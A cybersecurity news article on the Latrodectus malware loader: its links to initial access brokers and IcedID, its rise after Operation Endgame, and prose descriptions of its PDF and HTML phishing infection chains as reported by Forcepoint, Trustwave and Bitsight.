Meet Latrodectus: Initial access brokers’ new favorite malware loader

This year law enforcement agencies have disrupted some of the biggest botnets that were used as payload distribution platforms by ransomware gangs. But when big players disappear from the cybercriminal ecosystem others quickly step in to fill the void. Enter Latrodectus, a malware loader on the rise in attack campaigns in recent months.

“Currently, threat actors are increasingly adopting Latrodectus, utilizing prevalent attachment formats such as HTML and PDF,” researchers from security firm Forcepoint wrote in a new report. “It is typically engineered for stealth and persistence, complicating detection and eradication efforts.”

Also known as BlackWidow, IceNova, or Lotus, the Latrodectus malware loader first appeared in November 2023 in campaigns associated with a Russian threat actor that security firm Proofpoint tracks as TA577 and since December by another group tracked as TA578. Both groups are known initial access brokers (IABs), selling access to computers they’ve compromised to other groups looking to deploy their own payloads.

TA577 has used a variety of malware loaders and Trojans overs the years, including Qbot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike; TA578 has also used Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, and Cobalt Strike. Since both groups had a strong connection with IcedID it’s not surprising that Proofpoint found links between Latrodectus command-and-control infrastructure and that associated with IcedID in the past.

In May, law enforcement agencies from several European countries, along with those in the US and the UK seized thousands of domains and around a hundred servers used in the command infrastructure of IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and Trickbot, dealing a serious blow to those botnets. Dubbed Operation Endgame, the seizure was part of a larger law enforcement effort that has continued throughout the year.

Latrodectus: A new rising star

Since then, several security firms have reported an increase in Latrodectus activity, including Bitsight in June, Trustwave earlier this month, and now Forcepoint. Trustwave called it a rising star in the malware world and noted that Operation Endgame likely gave it a boost.

“Latrodectus primarily targets private sector organizations in North America and Europe, with the United States being the primary focus,” the Trustwave researchers wrote in their analysis. “It spreads through malspam campaigns, exploiting hijacked email threads and impersonating legitimate entities like Microsoft Azure and Cloudflare. This broad approach maximizes the potential for stealing valuable data from targeted companies.”

The loader uses obfuscation, encryption, and other sophisticated detection-evasion techniques. Its capabilities include gathering system information, establishing a backdoor, executing remote commands, and exfiltrating data from systems. Interestingly one of the commands observed by researchers is called cmd_run_icedid and is designed to download and execute a copy of the IcedID loader, adding a further connection to the notorious malware dropper that was once a vehicle for several ransomware families.

In one of the latest attacks observed by Forcepoint that targeted companies from the financial, automotive, and business sectors, attackers used a compromised email account to send phishing emails that contained a PDF attachment. When opened, this PDF included a button to download an important document from DocuSign.

The URL takes users through a series of redirects to an obfuscated JavaScript payload that invokes an ActiveXObject called “WindowsInstaller.Installer” to download a .msi installer file.

When executed, this file drops a DLL called vierm_soft_x64.dll in the AppData\Roaming folder, which is then executed via the Windows rundll32.exe. This DLL’s metadata appears to be copied from an Nvidia file called PhysXCooking64.dll. Once loaded in memory, the DLL unpacks and executes another DLL payload that then connects to a command-and-control server over port 8041.

Another infection chain for Latrodectus involves phishing emails with an HTML attachment instead of a PDF one. When the page is opened, it masquerades as a Word document pop-up that informs the user the document can’t be correctly displayed offline and offers a solution button.

Clicking the button will attempt to invoke PowerShell and execute a script that downloads the DLL payload and loads it with rundll32.exe without using the intermediary .msi executable file seen in the PDF variant.

Previous reports described Latrodectus distribution campaigns in which the attackers used .bat scripts or zipped JavaScript and ISO files as attachments. This suggests that the attackers who adopted this malware loader are trying a variety of infection vectors. In its June report, Bitsight reported identifying more than 5,000 unique victims from Latrodectus campaigns spread across the US, Canada, the UK, Europe, Australia, and Japan.